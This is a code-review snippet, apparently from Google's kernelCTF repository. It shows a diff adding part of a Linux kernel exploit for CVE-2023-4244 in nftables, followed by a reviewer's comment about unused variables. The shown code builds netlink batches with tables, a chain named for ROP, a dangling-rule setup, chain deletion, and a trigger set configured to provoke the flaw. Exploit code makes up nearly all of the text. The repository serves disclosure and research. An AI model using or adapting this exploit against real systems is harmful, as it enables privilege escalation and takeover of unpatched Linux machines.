pocs/linux/kernelctf/CVE-2023-4244_mitigation/exploit/mitigation-v3-6.1.55/exploit.c

```diff
@@ -0,0 +1,847 @@
+
+    nlh = nftnl_table_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), NFT_MSG_NEWTABLE, family, NLM_F_CREATE, seq++);
+    nftnl_table_nlmsg_build_payload(nlh, table);
+    mnl_nlmsg_batch_next(batch);
+
+    nftnl_batch_end(mnl_nlmsg_batch_current(batch), seq++);
+    mnl_nlmsg_batch_next(batch);
+
+    if (mnl_socket_sendto(nl, mnl_nlmsg_batch_head(batch), mnl_nlmsg_batch_size(batch)) < 0) {
+        err(1, "mnl_socket_send");
+    }
+
+    batch = mnl_nlmsg_batch_start(buf, BUF_SIZE);
+
+    nftnl_batch_begin(mnl_nlmsg_batch_current(batch), seq++);
+    mnl_nlmsg_batch_next(batch);
+
+    nlh = nftnl_chain_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), NFT_MSG_NEWCHAIN, family, NLM_F_CREATE, seq++);
+    nftnl_chain_nlmsg_build_payload(nlh, chain_rop);
+    mnl_nlmsg_batch_next(batch);
+
+    nlh = nftnl_chain_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), NFT_MSG_NEWCHAIN, family, NLM_F_CREATE, seq++);
+    nftnl_chain_nlmsg_build_payload(nlh, chain1);
+    mnl_nlmsg_batch_next(batch);
+
+    nlh = nftnl_rule_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), NFT_MSG_NEWRULE, family, NLM_F_CREATE, seq++);
+    nftnl_rule_nlmsg_build_payload(nlh, rule_dangling_4);
+    mnl_nlmsg_batch_next(batch);
+
+    nftnl_batch_end(mnl_nlmsg_batch_current(batch), seq++);
+    mnl_nlmsg_batch_next(batch);
+
+    if (mnl_socket_sendto(nl, mnl_nlmsg_batch_head(batch), mnl_nlmsg_batch_size(batch)) < 0) {
+        err(1, "mnl_socket_send");
+    }
+}
+
+void del_chain(char* chain_name){
+    struct nftnl_chain * chain = nftnl_chain_alloc();
+    nftnl_chain_set_str(chain, NFTNL_CHAIN_TABLE, table1_name);
+    nftnl_chain_set_str(chain, NFTNL_CHAIN_NAME, chain_name);
+    nftnl_chain_set_u32(chain, NFTNL_CHAIN_FLAGS, 0);
+
+    batch = mnl_nlmsg_batch_start(buf, BUF_SIZE);
+
+    nftnl_batch_begin(mnl_nlmsg_batch_current(batch), seq++);
+    mnl_nlmsg_batch_next(batch);
+
+    nlh = nftnl_chain_nlmsg_build_hdr(mnl_nlmsg_batch_current(batch), NFT_MSG_DELCHAIN, family, 0, seq++);
+    nftnl_chain_nlmsg_build_payload(nlh, chain);
+    mnl_nlmsg_batch_next(batch);
+
+    nftnl_batch_end(mnl_nlmsg_batch_current(batch), seq++);
+    mnl_nlmsg_batch_next(batch);
+
+    if (mnl_socket_sendto(nl, mnl_nlmsg_batch_head(batch), mnl_nlmsg_batch_size(batch)) < 0) {
+        err(1, "mnl_socket_send");
+    }
+}
+
+void trigger(char * trig_set_name, char * trig_chain_name){
+    uint32_t key_size = 0xc;
+
+    struct nftnl_set * set =  nftnl_set_alloc();
+
+    nftnl_set_set_str(set, NFTNL_SET_TABLE, table1_name);
+    nftnl_set_set_str(set, NFTNL_SET_NAME, trig_set_name);
+    nftnl_set_set_u32(set, NFTNL_SET_FLAGS,  NFT_SET_INTERVAL | NFT_SET_TIMEOUT | NFT_SET_MAP);
+    nftnl_set_set_u32(set, NFTNL_SET_KEY_LEN, key_size);
+    nftnl_set_set_u32(set, NFTNL_SET_ID, 1337);
+    nftnl_set_set_u32(set, NFTNL_SET_GC_INTERVAL, 1);
+    nftnl_set_set_u32(set, NFTNL_SET_DATA_TYPE, NFT_DATA_VERDICT);
+
+    uint8_t key_data[0x200] = {0,};
+    uint8_t key_end_data[0x2000] = {0,};
```

Comment:
The variables `key_end_data` and `user_data` are not used, please remove them: https://google.github.io/security-research/kernelctf/style_guide#unused-code